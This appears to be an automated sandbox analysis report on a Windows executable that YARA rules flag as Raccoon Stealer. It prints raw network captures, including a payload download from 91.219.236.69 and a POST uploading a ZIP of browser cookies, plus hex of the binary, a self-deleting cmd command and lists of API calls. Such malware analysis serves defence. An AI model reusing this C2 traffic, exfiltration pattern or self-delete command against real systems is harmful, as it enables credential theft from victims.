                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata |@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
                                                                                                                                                  Nov 25, 2021 18:24:09.047931910 CET1618INData Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                  Data Ascii: @B
                                                                                                                                                  Nov 25, 2021 18:24:09.047950029 CET1619INData Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc
                                                                                                                                                  Data Ascii: BZ|$D$4$!|$D$4$|$D$4$s|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
                                                                                                                                                  Nov 25, 2021 18:24:09.047974110 CET1620INData Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 80 f9 5b b1 5d 0f 44 d1 b9 01 00
                                                                                                                                                  Data Ascii: $1U1E]E]EEEtM`ay?U[]DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1
                                                                                                                                                  Nov 25, 2021 18:24:12.924736023 CET2567OUTGET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: 91.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:13.182619095 CET2569INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 25 Nov 2021 17:24:13 GMT
                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                  Content-Length: 2828315
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Last-Modified: Sun, 14 Nov 2021 14:06:12 GMT
                                                                                                                                                  ETag: "619117d4-2b281b"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04
                                                                                                                                                  Data Ascii: PKznN<{rinssdbm3.dll|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8K*grL*H.v6[*4I{1g<>M$G&Y-O9\,tWmX Y3*S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ*3\G5dZhVLZ|k5XFYlVVWC|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{|!OM>>$\.%LzFl3|0#*N+85NU4+bfS2:cz1C@AZ&woR@
                                                                                                                                                  Nov 25, 2021 18:24:45.701366901 CET11124OUTPOST / HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
                                                                                                                                                  Content-Length: 1400
                                                                                                                                                  Host: 91.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:45.701497078 CET11126OUTData Raw: d8 e1 19 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 36 6a
                                                                                                                                                  Data Ascii: --vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="i6j2Un0B3dP17SpzFNyq"; filename="i6j2Un0B3dP17SpzFNyq.zip"Content-Type: application/octet-streamPKySc*browsers/cookies/Google Chrome_D
                                                                                                                                                  Nov 25, 2021 18:24:45.996284962 CET11126INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 25 Nov 2021 17:24:45 GMT
                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                  Data Raw: 32 38 0d 0a 36 37 35 38 66 34 39 32 63 64 32 37 62 62 39 35 63 62 39 61 63 63 38 65 32 65 66 30 33 63 31 34 38 33 64 65 38 31 30 63 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 286758f492cd27bb95cb9acc8e2ef03c1483de810c0


                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.549766149.154.167.99443C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  2021-11-25 17:24:08 UTC0OUTGET /masterdanteloma HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                  Host: t.me
                                                                                                                                                  2021-11-25 17:24:08 UTC0INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                  Date: Thu, 25 Nov 2021 17:24:08 GMT
                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                  Content-Length: 4557
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: stel_ssid=e0e03c766d39c09004_12063181994975869117; expires=Fri, 26 Nov 2021 17:24:08 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Cache-control: no-store
                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                  2021-11-25 17:24:08 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 61 73 74 65 72 64 61 6e 74 65 6c 6f 6d 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 73 74 65 72 64 61 6e 74 65 6c 6f 6d 61 22 3e 0a 3c 6d 65 74 61 20 70 72 6f
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @masterdanteloma</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="masterdanteloma"><meta pro


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: Tk6dsSEyOC.exe PID: 7164 Parent PID: 6012

                                                                                                                                                  General

                                                                                                                                                  Start time:18:23:23
                                                                                                                                                  Start date:25/11/2021
                                                                                                                                                  Path:C:\Users\user\Desktop\Tk6dsSEyOC.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:437760 bytes
                                                                                                                                                  MD5 hash:3613E68843DD0C745F079A6EF51A6E6A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: cmd.exe PID: 4572 Parent PID: 7164

                                                                                                                                                  General

                                                                                                                                                  Start time:18:25:09
                                                                                                                                                  Start date:25/11/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: conhost.exe PID: 4560 Parent PID: 4572

                                                                                                                                                  General

                                                                                                                                                  Start time:18:25:10
                                                                                                                                                  Start date:25/11/2021
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: timeout.exe PID: 6656 Parent PID: 4572

                                                                                                                                                  General

                                                                                                                                                  Start time:18:25:11
                                                                                                                                                  Start date:25/11/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:timeout /T 10 /NOBREAK
                                                                                                                                                  Imagebase:0xff0000
                                                                                                                                                  File size:26112 bytes
                                                                                                                                                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >

                                                                                                                                                    Analysis Process: Tk6dsSEyOC.exe PID: 7164 Parent PID: 6012 Tk6dsSEyOC.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00429B40, Relevance: 185.8, APIs: 42, Strings: 60, Instructions: 7350threadsleepsynchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00429B45
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00429B61
                                                                                                                                                      • Part of subcall function 00434B18: OpenMutexA.KERNEL32 ref: 00434B59
                                                                                                                                                      • Part of subcall function 00434B18: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00434B66
                                                                                                                                                    • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00430EC5
                                                                                                                                                      • Part of subcall function 004378AC: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 004378BE
                                                                                                                                                      • Part of subcall function 004378AC: OpenProcessToken.ADVAPI32(00000000), ref: 004378C5
                                                                                                                                                      • Part of subcall function 004378AC: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004378DF
                                                                                                                                                      • Part of subcall function 004378AC: GetLastError.KERNEL32 ref: 004378E9
                                                                                                                                                      • Part of subcall function 004378AC: GlobalAlloc.KERNEL32(00000040,00000000), ref: 004378F9
                                                                                                                                                      • Part of subcall function 004378AC: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 0043790D
                                                                                                                                                      • Part of subcall function 004378AC: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437921
                                                                                                                                                      • Part of subcall function 004378AC: GlobalFree.KERNEL32 ref: 00437941
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 00429BA5
                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000), ref: 00429BAC
                                                                                                                                                      • Part of subcall function 00437951: __EH_prolog.LIBCMT ref: 00437956
                                                                                                                                                      • Part of subcall function 00437951: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004379BA
                                                                                                                                                      • Part of subcall function 00437951: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004379D4
                                                                                                                                                      • Part of subcall function 00437951: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00437A48
                                                                                                                                                      • Part of subcall function 00437951: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00437A5A
                                                                                                                                                      • Part of subcall function 00437951: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00437A75
                                                                                                                                                      • Part of subcall function 00437951: CloseHandle.KERNEL32(?,?,?,00000000), ref: 00437A82
                                                                                                                                                      • Part of subcall function 00437951: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00437A95
                                                                                                                                                      • Part of subcall function 00415227: __EH_prolog.LIBCMT ref: 0041522C
                                                                                                                                                    • Sleep.KERNEL32(00000DAC,?,00000000,004875A8,00000000,00477B1B,004875A8,00000000,00477B1B,?,00000000,?), ref: 0042A257
                                                                                                                                                    • Sleep.KERNEL32(000001F4,004875A8,00000000,00477B1B,?,00000000,?), ref: 0042A2AD
                                                                                                                                                      • Part of subcall function 0041562A: __EH_prolog.LIBCMT ref: 0041562F
                                                                                                                                                    • GetUserNameA.ADVAPI32(?,00000101), ref: 0042A4D5
                                                                                                                                                      • Part of subcall function 00432ADB: __EH_prolog.LIBCMT ref: 00432AE0
                                                                                                                                                      • Part of subcall function 00432ADB: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00487758,00000000,00000000), ref: 00432B20
                                                                                                                                                      • Part of subcall function 00432ADB: WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?), ref: 00432BEC
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    • Sleep.KERNEL32(00007530), ref: 0042A69C
                                                                                                                                                    • _strlen.LIBCMT ref: 0042A7B9
                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000,00487C78), ref: 0042AB60
                                                                                                                                                    • CreateThread.KERNEL32 ref: 0042AC6D
                                                                                                                                                    • CreateThread.KERNEL32 ref: 0042AC7F
                                                                                                                                                    • CreateThread.KERNEL32 ref: 0042AC91
                                                                                                                                                    • CreateThread.KERNEL32 ref: 0042ACA3
                                                                                                                                                      • Part of subcall function 00431668: __EH_prolog.LIBCMT ref: 00431E6F
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000,00000002,00000080), ref: 00437734
                                                                                                                                                      • Part of subcall function 0043770F: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,00433066,?,00000001,00000000), ref: 0043777B
                                                                                                                                                    • _strlen.LIBCMT ref: 0042A7D3
                                                                                                                                                      • Part of subcall function 00431276: __EH_prolog.LIBCMT ref: 0043127B
                                                                                                                                                      • Part of subcall function 00426E83: __EH_prolog.LIBCMT ref: 00426E88
                                                                                                                                                    • CreateThread.KERNEL32 ref: 0042AEC1
                                                                                                                                                    • CreateThread.KERNEL32 ref: 0042AF11
                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,?,?,00487C78,00000000,00000002,00000000,00000001,00000000,00000000,00000002,00000001,00000000), ref: 0042B164
                                                                                                                                                    • CreateThread.KERNEL32 ref: 0042B436
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042B43F
                                                                                                                                                      • Part of subcall function 0040C9C5: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000010,00000000,?), ref: 0040C9D8
                                                                                                                                                      • Part of subcall function 0040C9C5: DeleteFileTransactedA.KERNEL32 ref: 0040C9EF
                                                                                                                                                      • Part of subcall function 0040C9C5: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000010,00000000,?,?,?,00417CF0,00000012,?,?), ref: 0040C9FA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$H_prolog$Thread$OpenToken$Process$Sleep$ByteCharDeallocateFileGlobalHttpInformationMultiMutexNameTransactionUserWide_strlen$AllocCloseCommitConnectConvertCurrentDefaultDeleteDuplicateErrorFirstFreeHandleInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32TransactedUninitializeWait
